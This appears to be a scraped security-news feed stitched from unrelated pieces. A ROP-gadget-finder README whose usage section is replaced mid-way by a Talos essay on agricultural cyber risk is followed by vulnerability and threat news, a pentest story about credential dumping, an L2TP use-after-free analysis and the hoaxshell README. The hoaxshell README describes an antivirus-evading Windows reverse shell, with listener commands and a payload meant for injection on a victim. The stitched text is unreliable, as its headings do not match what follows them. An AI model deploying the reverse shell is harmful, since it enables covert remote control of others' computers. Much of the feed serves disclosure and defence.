ropr is a blazing fast multithreaded ROP Gadget finder

What is a ROP Gadget?

ROP (Return Oriented Programming) Gadgets are small snippets of a few assembly instructions typically ending in a ret instruction which already exist as executable code within each binary or library. These gadgets may be used for binary exploitation and to subvert vulnerable executables.

When the addresses of many ROP Gadgets are written into a buffer we have formed a ROP Chain. If an attacker can move the stack pointer into this ROP Chain then control can be completely transferred to the attacker.

Most executables contain enough gadgets to write a turing-complete ROP Chain. For those that don't, one can always use dynamic libraries contained in the same address-space such as libc once we know their addresses.

The beauty of using ROP Gadgets is that no new executable code needs to be written anywhere - an attacker may achieve their objective using only the code that already exists in the program.

How do I use a ROP Gadget?

Typically the first requirement to use ROP Gadgets is to have a place to write your ROP Chain - this can be any readable buffer. Simply write the addresses of each gadget you would like to use into this buffer. If the buffer is too small there may not be enough room to write a long ROP Chain into and so an attacker should be careful to craft their ROP Chain to be efficient enough to fit into the space available.

The next requirement is to be able to control the stack - This can take the form of a stack overflow - which allows the ROP Chain to be written directly under the stack pointer, or a "stack pivot" - which is usually a single gadget which moves the stack pointer to the rest of the ROP Chain.

Once the stack pointer is at the start of your ROP Chain, the next ret instruction will trigger the gadgets to be excuted in sequence - each using the next as its return address on its own stack frame.

It is also possible to add function poitners into a ROP Chain - taking care that function arguments be supplied after the next element of the ROP Chain. This is typically combined with a "pop gadget", which pops the arguments off the stack in order to smoothly transition to the next gadget after the function arguments.

How do I install ropr?

• Requires cargo (the rust build system)

Easy install:

cargo install ropr

the application will install to ~/.cargo/bin

From source:

git clone https://github.com/Ben-Lichtman/ropr
cd ropr
cargo build --release

the resulting binary will be located in target/release/ropr

Alternatively:

git clone https://github.com/Ben-Lichtman/ropr
cd ropr
cargo install --path .

the application will install to ~/.cargo/bin

How do I use ropr?

By Joe Marshall.

The war in Ukraine has had far-reaching global implications and one of the most immediate effects felt will be on the global supply chain for food. This war-induced fragility has exposed the weaknesses of how we feed ourselves globally. Ransomware cartels and other adversaries are well aware of this and are actively exploiting that fragility. 

For the past six years, Cisco Talos has been actively involved in assisting public and private institutions in Ukraine to defend themselves against state-sponsored actors. Our involvement stretches the gamut from commercial to critical infrastructure, to election security. Our presence has afforded us unique opportunities and observations about cybersecurity in a macro and micro way.

To truly grasp the implications of the war in Ukraine, we have to examine how vital Ukrainian agriculture feeds the world, the current state of affairs, and what this means for the global cybersecurity posture to protect agricultural assets. 

Where there is weakness, there is opportunity

Ransomware cartels and their affiliates are actively targeting the agricultural industry. Moreover, these actors have done their homework and are targeting agricultural companies during the two times of the year where they cannot suffer disruptions: planting and harvesting. Per the published FBI PIN Alert: “Cyber actors may perceive cooperatives as lucrative targets with a willingness to pay due to the time-sensitive role they play in agricultural production.” 

This is far from unusual for these adversaries — they are shrewd and calculating, and understand their victims’ weaknesses and industries. However, there is a larger picture we have to consider. Due to the war in Ukraine, the world’s global agriculture food supply chain is under serious threat. The world is already facing several stresses on the global economy and supply chain, including rising costs of food, inflation and the ongoing COVID-19 pandemic. Food insecurity, starvation and additional global unrest are all but assured as the war in Ukraine rages on. This chaos, in turn, can add more fuel to the fire that is cyber attacks on agriculture. To truly grasp the enormity of this, let’s look at Ukraine, a massive global supplier of agriculture and the implications for global agriculture security.

Just how important is Ukraine in global agriculture

Ukraine is often referred to as the “Breadbasket of Europe,” and it is a well-earned moniker. 

As of 2021, Ukraine accounted for the sixth most-exported wheat in the world. That is 10% of the market share, producing 20 million tons of wheat and was valued at $5.1 billion, with Egypt, Indonesia, Turkey, Pakistan and Bangladesh as the primary destinations. Ukraine is unique in that a large portion of the country's land has incredibly fertile soil, with over half the country having well-suited arable land dedicated to crops like wheat, maize and sunflower. Some may assume that swathes of rich land are all that is necessary to be an agriculture giant, but in truth, one needs a well-laid and maintained infrastructure to move crops, seeds and fertilizer, and robust deep water oceanic ports that can import and export products quickly. Ukraine has all of that. Or, it did.

Understanding the mess of Ukrainian wartime agriculture

It is something of an understatement to say that Ukrainian agriculture exports are in dire straights. Currently, due to the invasion, Ukraine has limited access to seaports to export its extensive backlog of wheat and other agricultural products. Pre-war, 70% of agriculture was exported via seaports, averaging 25 million metric tons a year. This has been reduced to a trickle — only 2 million tons were exported in June alone, a far cry from the 4 million that’s typical of that time of year. Poor countries that cannot shoulder the steep increase in prices will suffer the most. Forty percent of Ukraine’s wheat exports go directly to the U.N. World Food Program, which helps feed these poorer countries. 

Additionally complicating matters is the act of planting and harvesting in Ukraine. Some farm fields are now filled with mines — unexploded ordinances — and farm labor is difficult to find. These factors can create delays that can be catastrophic to the sustainability of a farm's ability to provide food to the world. For example, every day delayed during a planting season could affect the total bushel-per-acre yield, without taking into consideration weather, market conditions, and of course, armed conflict. 

There is also a lack of grain storage capacity for current harvests, as grain is trapped in silos and there are very poor logistics to export out of the country via methods other than bulk oceanic freight. Without the ability to effectively ship last year's harvest, and this year's current harvest being reaped, planting for the 2023’s harvest is in serious jeopardy. All of these complications means Ukraine will effectively have a vastly and painfully reduced presence in the agriculture market for years to come.

Ukraine and Russia recently signed a U.N.-brokered deal, in which an agreement to allow grain shipping exports to resume via the Odessa seaport. This is a much-needed means to deliver trapped grain products in Ukraine, but the agreement is on very precarious footing. Russia is still actively bombing and targeting the Odessa metropolis, and has demonstrated time and again that it is willing to abandon agreements when it suits them. This agreement also runs somewhat counter to the Russian tactic of weaponizing the food supply chain to its advantage. By artificially creating scarcity, Russia can leverage concessions from a global community that relies deeply on Ukrainian grain exports to feed the world. A lack of scarcity could inhibit one of the few cards they can play to compel global compliance to its demands. Historically, Russia is not shy about using famine and scarcity as a weapon. 

No easy answers  

War is chaos. Relying on the questionable availability of a seaport is not ideal. Ukraine is looking for additional ways to export their trapped agricultural products without the reliance on the pseudo availability of its Odessa seaport, which as of this writing, are very laboriously exporting via rail to other Eastern European countries, or via the Danube river to other countries' seaports. The Bessarabia region, in the Odessa Oblast, has two prominent river ports: Izmail and Reni. These ports, however, are quite old and were not built to ingest and export agriculture at peacetime volumes. Even utilizing seaports reached via river barge, like Constanta in Romania, only offers a small percentage of peacetime oceanic volume. 

Even the Ukrainian rail system is problematic for shipping agricultural products. Ukraine has older Soviet railroad tracks that are incompatible with countries like Poland and cannot just roll trains to the rest of Europe without considerable effort. To put it all succinctly: There are only bad answers to the terrible questions of how to export agriculture in the middle of a Russian invasion. 

So what are the security threat models to agriculture? 

Industry-specific instability is seen as enticing, as victims are seen to be more compliant to pay an extortion fee in exchange for the return of their data and network. The more unstable and exposed the industry, the more compelling it is to an attacker. Nation states may also see agricultural instability as an opportunistic way to project power and advance national interests. 

Critical infrastructure, like agriculture, is part of a complex and interwoven network of critical services that let society function. Cyber attacks on that infrastructure will always carry value to a nation-state's advanced persistent threat actor. The ability to disrupt or deny critical services is a potent weapon to enforce one nation’s will over another. Even indirect attacks can affect agriculture. Cyber-attacks launched against energy or water industries can create a ripple effect that impedes the ability of agriculture to produce at optimum. Ukraine has a long history of suffering these kinds of cyber-attacks, including the costly NotPetya attack, that was attributed to Russian APTs.

There are also mutual interests that criminal ransomware cartels and the Russian government share. Ransomware cartels are not shy about their relationships with Russia. Many ransomware gangs also operate within that country's borders with relative impunity. These groups, who often act as proxy state-sponsored actors, have financial interests that align with the Russian government. Russia is kinetically targeting agriculture with the express intent of creating additional food chain supply insecurity. Ransomware cartels also want to extort victims and additional food and supply chain disruptions continue to favor Russian interests.   

Much like the Colonial Pipeline ransomware attack, there are also unintended consequences of a cyber-attack that have a way of trickling down into how businesses can operate in an industrial environment. As defenders, we must consider our integrations into industrial operations. Agriculture industries are rapid adopters of industrial automation. The imperative to produce rapidly and deliver to market is driving companies to remove the human element where possible. For example, a fully automated grain elevator removes the need for humans to assist in the unloading of grain, extending the serviceable hours an elevator can stay open for farmers. Automated milking systems make it possible to increase milk cows more frequently, and automated feed pushers keep herds fed so milk production stays consistent.  As you think about cyber defense, ask yourself what does an attack on your converged farms and facilities looks like? Would the loss of IT assets trickle into industrial operational technology that lets your business operate? Could you still ship perishable milk? Could a grain elevator still operate?  

What does this mean for cyber defenders?  

The invasion of Ukraine is awful. And it is easy to be lost in the suffering and sacrifice of the Ukrainian people. Now is the time, more than ever, to understand what is at stake and what we can do to keep the world fed. Whether we’re protecting a direct agriculture business, or something agricultural-adjacent, now is the time to reflect on business resiliency. As defenders, we cannot control war, the weather, or the agriculture market. Instead, the security community should consider this an opportunity to improve their situational awareness. By just maintaining awareness of outside events, we can draw a better picture of the current security risks. It can be easy to dismiss global events as having no additional effects on an organization’s cybersecurity posture — we’re under constant attack as it is. Instead, consider not the “what,” but the “why” of adversary motivations, and how that can affect potential targets. Understanding that could make all the difference in keeping businesses safe and productive.  

Executive call to action 

For executive leadership, now is an opportune time to evaluate your accepted business risks. That means taking the time to understand how interconnected your agriculture operations are to your corporate offices. Could you function as a business should a ransomware attack affect you? What investments have you made to build resiliency into your operations? These are incredibly difficult questions to answer. Use the catalyst of global events to invest in technology and more importantly, people, to help you find those answers. Be proactive, and train for climatic events like a cyber-attack. Utilize third-party services to give unbiased evaluations of your resiliency and recovery. Perhaps most importantly – resist complacency. Cybersecurity threats evolve and shift as do global events. Maintaining strong situational awareness could be the critical deciding factor between a crippling costly cyber-attack and a resilient enterprise able to weather any storm. The fate of the world’s agricultural supply chain could rely on it.  

Apple addressed two zero-day vulnerabilities, exploited by threat actors, affecting iOS, iPadOS, and macOS devices.

Apple this week released security updates for iOS, iPadOS, and macOS platforms to address two zero-day vulnerabilities exploited by threat actors. Apple did not share details about these attacks.

The two flaws are:

• CVE-2022-32893 – An out-of-bounds issue in WebKit which. An attacker can trigger the flaw by tricking target devices into processing maliciously crafted web content to achieve arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

• CVE-2022-32894 – An out-of-bounds issue in the OS Kernel that could be exploited by a malicious application to execute arbitrary code with the highest privileges.

The vulnerabilities have been fixed with the release iOS 15.6.1, iPadOS 15.6.1, and macOS Monterey 12.5.1. The iOS and iPadOS updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).

The IT giant solved both the vulnerabilities with improved bounds checking.

Apple has addressed other six zero-day vulnerabilities since January, below is the list of fixed issues:

• January 2022: CVE-2022-22587 and CVE-2022-22594.
• February 2022: CVE-2022-22620.
• March 2022: CVE-2022-22674 and CVE-2022-22675.
• May 2022: CVE-2022-22675

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Apple)

Exploit code for a critical vulnerability affecting networking devices using Realtek RTL819x system on a chip released online.

The PoC exploit code for a critical stack-based buffer overflow issue, tracked as CVE-2022-27255 (CVSS 9.8), affecting networking devices using Realtek’s RTL819x system on a chip was released online. The issue resides in the Realtek’s SDK for the open-source eCos operating system, it was discovered by researchers from cybersecurity firm Faraday Security

“On Realtek eCos SDK-based routers, the ‘SIP ALG’ module is vulnerable to buffer overflow. The root cause of the vulnerability is insufficient validation on the received buffer, and unsafe calls to strcpy. The ‘SIP ALG’ module calls strcpy to copy some contents of SIP packets to a predefined fixed buffer and does not check the length of the copied contents.” reads the advisory published by Realtek, which published the issue in March 2022. “A remote attacker can exploit the vulnerability through a WAN interface by crafting arguments in SDP data or the SIP header to make a specific SIP packet, and the successful exploitation would cause a crash or achieve the remote code execution.”

Millions of devices, including routers and access points, are exposed to hacking.

The experts (Octavio Gianatiempo, Octavio Galland, Emilio Couto, Javier Aguinaga) disclosed technical details of the flaw at the DEFCON hacker conference last week.

A remote attacker can exploit the flaw to execute arbitrary code without authentication by sending to the vulnerable devices specially crafted SIP packets with malicious SDP data.

The issue is very dangerous because the exploitation doesn’t require user interaction.

The PoC code developed by the experts works against Nexxt Nebula 300 Plus routers.

“This repository contains the materials for the talk “Exploring the hidden attack surface of OEM IoT devices: pwning thousands of routers with a vulnerability in Realtek’s SDK for eCos OS.”, which was presented at DEFCON30.” reads the description provided with the exploit code on GitHub.

The repo includes:

• analysis: Automated firmware analysis to detect the presence of CVE-2022-27255 (Run analyse_firmware.py).
• exploits_nexxt: PoC and exploit code. The PoC should work on every affected router, however the exploit code is specific for the Nexxt Nebula 300 Plus router.
• ghidra_scripts: Vulnerable function call searching script and CVE-2022-27255 detection script.
• DEFCON: Slide deck & poc video.

Johannes Ullrich, Dean of Research at SANS shared a Snort rule that can be used to detect PoC exploit attempt.

“The rule looks for “INVITE” messages that contain the string “m=audio “. It triggers if there are more than 128 bytes following the string (128 bytes is the size of the buffer allocated by the Realtek SDK) and if none of those bytes is a carriage return. The rule may even work sufficiently well without the last content match. Let me know if you see any errors or improvements.” wrote the expert.

Slides for the DEFCON presentation along with exploits, and a detection script for CVE-2022-27255 are available in this GitHub repository.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Realtek)

The post PoC exploit code for critical Realtek RCE flaw released online appeared first on Security Affairs.

A China-linked APT group named RedAlpha is behind a long-running mass credential theft campaign aimed at organizations worldwide.

Recorded Future researchers attributed a long-running mass credential theft campaign to a Chinese nation-state actor tracked RedAlpha. The campaign targeted global humanitarian, think tank, and government organizations.

Experts believe RedAlpha is a group of contractors conducting cyber-espionage activity on behalf of China. Recorded Future identified a link between RedAlpha and a Chinese information security company, whose name appears in the registration of multiple RedAlpha domains. The company called “Nanjing Qinglan Information Technology Co., Ltd.” is now known as “Jiangsu Cimer Information Security Technology Co. Ltd.

“In this activity, RedAlpha very likely sought to gain access to email accounts and other online communications of targeted individuals and organizations.” reads the report published by Recorded Future.

“RedAlpha’s humanitarian and human rights-linked targeting and spoofing of organizations such as Amnesty International and FIDH is particularly concerning given the CCP’s reported human rights abuses in relation to Uyghurs, Tibetans, and other ethnic and religious minority groups in China.”

Since 2019, RedAlpha registering and weaponizing hundreds of domains that were spoofing organizations such as the International Federation for Human Rights (FIDH), Amnesty International, the Mercator Institute for China Studies (MERICS), Radio Free Asia (RFA), the American Institute in Taiwan (AIT), and other global government, think tank, and humanitarian organizations.

Experts also noticed that the attackers used domains spoofing major email and storage service providers like Yahoo (135 typosquat domains), Google (91 typosquat domains), and Microsoft (70 typosquat domains). The domains some cases were hosting fake login pages for popular email providers such as Outlook and Zimbra.

The attackers sent out phishing messages leading victims to phishing pages posing as legitimate email login portals. Experts believe attackers target individuals affiliated with the above organizations rather than imitating these organizations to target other third parties.

The attack vector is phishing emails containing PDF files that embed malicious links that point to the phishing login pages.

“RedAlpha’s activity has expanded over the past several years to include credential-phishing campaigns spoofing ministries of foreign affairs in multiple countries.” continues the report. “We observed phishing pages imitating webmail login portals for Taiwan and Portugal’s MOFAs, as well as multiple domains spoofing Brazil and Vietnam’s MOFAs.”

“Based on these findings and wider activity examined, it is very likely that RedAlpha operators are located within the PRC. Chinese intelligence services’ use of private contractors is also an established trend, with groups such as APT3, APT10, RedBravo (APT31), and APT40 all identified as contractors working for China’s Ministry of State Security (MSS) (1,2,3,4).” concludes the report. “In the case of RedAlpha, the group’s targeting closely aligns with the strategic interests of the Chinese government, such as the observed emphasis on China-focused think tanks, civil society organizations, and Taiwanese government and political entities.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, RedAlpha)

Researchers have discovered a previously undocumented Android dropper, dubbed BugDrop, that’s still under development.

Recently, researchers from ThreatFabric discovered a previously undetected Android dropper, dubbed BugDrop, which is under active development and was designed to bypass security features that will be implemented in the next release of the Google OS.

The experts noticed something unusual in the latest sample of the malware family Xenomorph, it was an improved version of the threat that included RAT capabilities by using “Runtime modules”. The Runtime modules allow the malware to perform gestures, touches, and other operations.

The new version of Xenomorph was dropped by the BugDrop malware which is able to defeat security measures that Google will introduce to prevent malware requesting Accessibility Services privileges from victims.

The dropper was developed by a cybercriminal group known as Hadoken Security, which is the same threat actor that is behind Xenomorph and Gymdrop Android malware.

The malicious application spotted by the researchers poses as a QR code reader.

Upon launching the application it will request the Accessibility Services access to the user to perform gestures and touches on behalf of the victim.

“Once granted, while showing a loading screen, the dropper initiates a connection with its onion.ws C2, which relies on the TOR protocol, obtaining back its configuration and the URL of the payload to download and install.” reads the analysis of the experts. “Throughout the course of our investigation, this URL changed from being one of the samples in the open folder, to an external URL again referring to QR code scanners functionalities, which used a endpoint very similar to what was used by Gymdrop samples that we observed in the wild in the last few months.”

The presence of instructions in the dropper code to send error messages back to the C2 suggests it is still under development.

The experts noticed that starting with Android 13, Google is blocking accessibility API access to apps installed from outside of the official app store.

However, BugDrop, attempts to bypass this security measure by deploying malicious payloads via a session-based installation process.

“In this context, it is important to remind the new security features of Android 13, which will be released in fall of 2022. With this new release, Google introduced the “restricted setting” feauture, which blocks sideloaded applications from requesting Accessibility Services privileges, limiting this kind of request to applications installed with a session-based API (which is the method usually used by app stores).” states the analysis. “With this in mind, it is clear what criminals are trying to achieve. What is likely happening is that actors are using an already built malware, capable of installing new APKs on an infected device, to test a session based installation method, which would then later be incorporated in a more elaborate and refined dropper.”

Upon completing the development of the new features, BugDrop will give attackers new capabilities to target banking institutions and bypass security solutions currently being adopted by Google.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, BugDrop)

The post Download: The Shortcomings of Traditional Penetration Tests appeared first on Horizon3.ai.

Google addressed a dozen vulnerabilities in the Chrome browser, including the fifth Chrome zero-day flaw exploited this year.

Google this week released security updates to address a dozen vulnerabilities in its Chrome browser for desktops including an actively exploited high-severity zero-day flaw in the wild.

The actively exploited flaw, tracked as CVE-2022-2856, is an Insufficient validation of untrusted input in Intents. The flaw was discovered by Ashley Shen and Christian Resell of Google Threat Analysis Group on 19 July 2022.

“Google is aware that an exploit for CVE-2022-2856 exists in the wild.” reads the advisory published by Google.

Google did not share technical details about the issue to prevent further exploitation in the wild.

The IT giant also fixed a critical issue, tracked as CVE-2022-2852, which is use after free in FedCM. This issue was reported by Google Project Zero researcher Sergei Glazunov on August 2, 2022.

Below is the list of the other issues addressed by the company:

• [$7000][1337538] High CVE-2022-2854: Use after free in SwiftShader. Reported by Cassidy Kim of Amber Security Lab, OPPO Mobile Telecommunications Corp. Ltd. on 2022-06-18
• [$7000][1345042] High CVE-2022-2855: Use after free in ANGLE. Reported by Cassidy Kim of Amber Security Lab, OPPO Mobile Telecommunications Corp. Ltd. on 2022-07-16
• [$5000][1338135] High CVE-2022-2857: Use after free in Blink. Reported by Anonymous on 2022-06-21
• [$5000][1341918] High CVE-2022-2858: Use after free in Sign-In Flow. Reported by raven at KunLun lab on 2022-07-05
• [$NA][1350097] High CVE-2022-2853: Heap buffer overflow in Downloads. Reported by Sergei Glazunov of Google Project Zero on 2022-08-04
• [$3000][1338412] Medium CVE-2022-2859: Use after free in Chrome OS Shell. Reported by Nan Wang(@eternalsakura13) and Guang Gong of 360 Alpha Lab on 2022-06-22
• [$2000][1345193] Medium CVE-2022-2860: Insufficient policy enforcement in Cookies. Reported by Axel Chong on 2022-07-18
• [$TBD][1346236] Medium CVE-2022-2861: Inappropriate implementation in Extensions API. Reported by Rong Jian of VRI on 2022-07-21

The CVE-2022-2856 is the fifth zero-day vulnerability in Chrome that Google has addressed this year, the other ones are:

• CVE-2022-2294 (July 4) – Heap buffer overflow in the Web Real-Time Communications (WebRTC) component
• CVE-2022-1364 (April 14) –  type confusion issue that resides in the V8 JavaScript engine
• CVE-2022-1096 – (March 25) – type Confusion in V8 JavaScript engine
• CVE-2022-0609 – (February 14) – use after free issue that resides in the Animation component.

Users should update to version 104.0.5112.101 for macOS and Linux and 104.0.5112.102/101 for Windows.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Chrome)

The only constant in IT today is change. That change might be an all-encompassing digital transformation brought on by a global pandemic, or merely a change of employee credentials. Either way, there is constant change in our organizations today.

The risk associated with that change does not always have a direct relationship with the level of effort to implement that change. Whether the change is extensive or trivial, when combined with other threat vectors that exist on the attack surface, it can put your organization at serious risk. That risk also depends on what data bad actors have been able to collect on you or your organization during their reconnaissance stage. Chained together with any weaknesses present, the change may have introduced a low severity misconfiguration that could lead to a critical impact.

Here’s an example of a minor change that led to a major impact. Our autonomous pentesting platform, NodeZero, discovered a customer’s host that had not appeared in previous pentests. This new host was either not online or not communicating on the network previously ­– but NodeZero saw that it was actively sending packets across the network via LDAP to communicate with Active Directory.

Just as an attacker would, NodeZero sought to exploit this potential opportunity by executing OSINT, Open-Source Intelligence, on the company and its employee base. NodeZero then generated multiple potential usernames, password sprayed for potential valid user accounts, and was able to compromise a valid credential in a matter of seconds. Subsequently, NodeZero leveraged the successfully obtained credential and chained this together with other data that it had found via enumerating network infrastructure. NodeZero fingerprinted several other hosts, before it finally found a host that this credential had local admin privileges on. Node Zero was finally able to dump the credentials from the SAM database, the LSASS service, and LSA secrets.

The customer was convinced that the NodeZero results were a false positive. However, with the full transparency and depth of information of the attack path and as well as the proof that NodeZero provided, we provided the user with insight on how one single changed credential could be reused on multiple hosts and lead to numerous critical impacts. One of these impacts led to domain compromise – NodeZero was able to successfully log in to the domain controller via four different domain admin credentials and via four separate attack paths.

Prior to running the pentest, our customer expected to find no critical impacts and/or any credentials compromised. Much to their own disappointment – though that disappointment turned to surprise and appreciation – NodeZero still harvested 776 credentials and 43 file shares. These led to several critical impacts including, but not limited to, domain compromise, numerous domain user compromises, and sensitive data exposure.

Many organizations adhere to regulatory bodies or are required by their internal/external stakeholders to adhere to certain standards. Almost all the standards, policies, and regulations in some way, shape, or form require a strong password policy in place, implemented, and enforced. NodeZero empowered the customer with insight into how their weak password policy allowed a minor change in credentials of one single user to lead to several critical impacts.

It is crucial to continuously assess your network and identify the most critical weak links that could potentially be exploited by cyber threat actors. A weak link that doesn’t exist today doesn’t mean that it won’t exist tomorrow. Change is inevitable so when it comes to security, and our advice is to continuously run pentests to find and fix any exploitable vulnerabilities and verify that they are fixed.

NodeZero is a true self-service SaaS offering. It is safe to run in production and requires no persistent or credentialed agents. NodeZero combines the lower cost and high frequency testing capabilities of automated pentesting with the expertise, thoroughness, and precision of manual pentests performed by highly skilled security professionals. The result: the ability to run continuous purple team exercises at a low annual cost.

Want to see it in action? Schedule a demo today.

This article was written by Habibeh Deyhim, Customer Success Leader with Horizon3.ai. You can find her on LinkedIn here. 

The post One Weak Password Leads to Compromise appeared first on Horizon3.ai.

Nettitude discovered a Memory Leak turned Use after Free (UaF) bug in the Microsoft implementation of the L2TP VPN protocol. The vulnerability affects most server and desktop versions of Windows, dating back to Windows Server 2008 and Windows 7 respectively. This could result in a Denial of Service (DoS) condition or could potentially be exploited to achieve Remote Code Execution (RCE).

Please see the official Microsoft advisory for full details:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30211

L2TP is a relatively uncommonly used protocol and sits behind an IPSEC authenticated tunnel by default, making the chances of seeing this bug in the wild extremely low. Despite the low likelihood of exploitation, analysis of this bug demonstrates interesting adverse effects of code which was designed to actually mitigate security risk.

L2TP and IPSEC

The default way to interact with an L2TP VPN on Windows Server is by first establishing an IPSEC tunnel to encrypt the traffic. For the purposes of providing a minimalistic proof of concept, I tested against Windows Server with the IPSEC tunnelling layer disabled, interacting directly with the L2TP driver. Please note however, it is still possible to trigger this bug over an IPSEC tunnelled connection.

For curious readers, disabling IPSEC can be achieved by setting the ProhibitIpSec DWORD registry key with a value of 1 under the following registry path:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters\

This will disable IPSEC tunnelling and allow L2TP to be interacted with directly over UDP. Not to discourage a full IPSEC + L2TP solution, but it does make testing the L2TP driver a great deal easier!

Vulnerability Details

The bug in question is a reference increment bug located in the rasl2tp.sys L2TP VPN protocol driver, and relates to how tunnel context structures are reused. Each established tunnel for a connection is allocated a context structure, and a unique tunnel is considered to be the pairing of both a unique tunnel ID and UDP + IP address.

When a client initiates an L2TP StartControlConnectionRequest for a tunnel ID that they have previously used on a source IP and port that the server has already seen, the rasl2tp driver will attempt to reuse a previously allocated structure as long as it is not in an unusable state or already freed. This functionality is handled by the SetupTunnel function when a StartControlConnectionRequest is made with no tunnel or session ID specified in the L2TP Header, and an assigned tunnel ID matching one that has already been used.

Pseudo code for the vulnerable section is as follows:

if ( !lpL2tpHeaderHasTunnelID )
{
   // Tunnel Lookup function uses UDP address information as well as TunnelID to match a previous Tunnel Context structure
   NewTunnel = TunnelCbFromIpAddressAndAssignedTunnelId(lpAdapterCtx, lpSockAddr, lpTunnelId);
   if ( NewTunnel ) // if a match is found a pointer is returned else the return is NULL
   {
      if...
      ReferenceTunnel(NewTunnel, 1); // This is the vulnerable reference count
      KeReleaseSpinLock(&lpAdapterCtx->TunnelLock, lpAdapterCtx->TunnelCurIRQL);
      return NewTunnel;
   }
}

The issue is that the reference count does not have an appropriate dereference anywhere in the code. This means that it is possible for a malicious client to continually send StartControlConnectionRequests to increment the value indefinitely.

This creates two separate vulnerable conditions. Firstly, because the reference count can be far greater than it should be, it is possible for an attacker to abuse the issue to exhaust the memory resources of the server by spoofing numerous IP address and tunnel ID combinations and sending several StartControlConnectionRequests. This would keep the structures alive indefinitely until the server’s resources are exhausted, causing a denial of service. This process can be amplified across many nodes to accelerate the process of consuming server resources and is only limited by the bandwidth capacity of the server. In reality, this process may also be limited by other factors applied to network traffic before the L2TP protocol is handled.

The second vulnerable condition is due to logic in the DereferenceTunnel function responsible for removing tunnel references and initiating the underlying free operation. It is possible to turn this issue into a Use after Free (UaF) vulnerability, which could potentially then be used to achieve Remote Code Execution.

Some pseudo code for the logic that allows this to happen in the DereferenceTunnel function is as follows:

__int64 __fastcall DereferenceTunnel(TunnelCtx *TunnelCtx)
{
   ...

   lpAdapterCtx = TunnelCtx->AdapterCtx;
   lpTunnelCtx = TunnelCtx;
   lpAdapterCtx->TunnelCurIRQL = KeAcquireSpinLockRaiseToDpc(&lpAdapterCtx->TunnelLock);
   RefCount = --lpTunnelCtx->TuneelRefCount;
   if ( !RefCount )
   {
      // This code path properly removes the Tunnel Context from a global linked list and handles state termination
      ...
   }
   KeReleaseSpinLock(&lpAdapterCtx->TunnelLock, lpAdapterCtx->TunnelCurIRQL);
   if ( RefCount > 0 ) // This line is vulnerable to a signed integer overflow
      return (unsigned int)RefCount;
   ...
   lpTunnelCtx->TunnelTag = '0T2L';
   ExFreePoolWithTag(&lpTunnelCtx[-1].TunnelVcListIRQL, 0);
   ...
   return 0i64;
}

The second check of the reference count that would normally cause the function to return uses a signed integer for the reference count variable. This means using the reference increment bug we can cause the reference count value to overflow and become a negative number. This would cause the DereferenceTunnel function to free the target tunnel context structure without removing it from the global linked list.

The global linked list in question is used to store all the active tunnel context structures. When a UDP packet is handled, this global linked list is used to lookup the appropriate tunnel structure. If a freed structure was still present in the list, any UDP packet referencing the freed context structure’s ID would be able to gain access to the freed structure and could be used to further corrupt kernel memory.

Exploitation

Exploitation of this bug outside of just exhausting the memory resources of a target server could take a very long time and I suspect would not realistically be exploitable or viable. Since a reference count can only happen once per UDP packet and each UDP message has to be large enough to contain all prior network stack frames and the required L2TP (and IPSEC) messages, the total required throughput is huge and would almost definitely be detected as a denial of service (DoS) attack long before reaching the required reference count.

Conclusion

This leaves the question of why would a developer allow a reference count to be handled in this way, when it should only ever require a minimum value of 0?

The main reason for allowing a reference count to become a negative number is to account or check for code that over removes references, and would typically result in an unsigned overflow. This kind of programming is a way of mitigating the risk posed by the more likely situation that a reference count is over-decremented. However, a direct result is that the opposite situation then becomes much more exploitable and in this scenario results in a potential for remote code execution (RCE).

Despite this, the mitigation is still generally effective, and the precursors for exploitation of this issue are unlikely to be realistically exploitable. In a way, the intended mitigation works because even though the maximum possible impact is far greater, the likelihood of exploitation is far lower.

Timeline

• Vulnerability Reported To Microsoft – 20 April 2022
• Vulnerability Acknowledged – 20 April 2022
• Patch In Development – 23 June 2022
• Patch Released – 12 July 2022

The post CVE-2022-30211: Windows L2TP VPN Memory Leak and Use after Free Vulnerability appeared first on Nettitude Labs.

In this article, VerSprite's Offensive Security team explore the difference between common security risk assessments (vulnerability assessment, penetration testing, and red teaming) as we walk you through real exploits we have used to test organizations' security protocols.

The post Attacking Your Assumptions: How Criminal Tactics Can Save Your Organization appeared first on VerSprite.

hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use, it generates it's own PowerShell payload and it supports encryption (ssl).

So far, it has been tested on fully updated Windows 11 Enterprise and Windows 10 Pro boxes (see video and screenshots).

Video Presentation

Screenshots

Find more screenshots here.

Installation

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

Usage

Basic shell session over http

sudo python3 hoaxshell.py -s <your_ip>

When you run hoaxshell, it will generate its own PowerShell payload for you to copy and inject on the victim. By default, the payload is base64 encoded for convenience. If you need the payload raw, execute the "rawpayload" prompt command or start hoaxshell with the -r argument. After the payload has been executed on the victim, you'll be able to run PowerShell commands against it.

Encrypted shell session (https):

# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

The generated PowerShell payload will be longer in length because of an additional block of code that disables the ssl certificate validation.

Grab session mode

In case you close your terminal accidentally, have a power outage or something, you can start hoaxshell in grab session mode, it will attempt to re-establish a session, given that the payload is still running on the victim machine.

sudo python3 hoaxshell.py -s <your_ip> -g

Important: Make sure to start hoaxshell with the same settings as the session you are trying to restore (http/https, port, etc).

Limitations

The shell is going to hang if you execute a command that initiates an interactive session. Example:

# this command will execute succesfully and you will have no problem: 
> powershell echo 'This is a test'

# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
> powershell

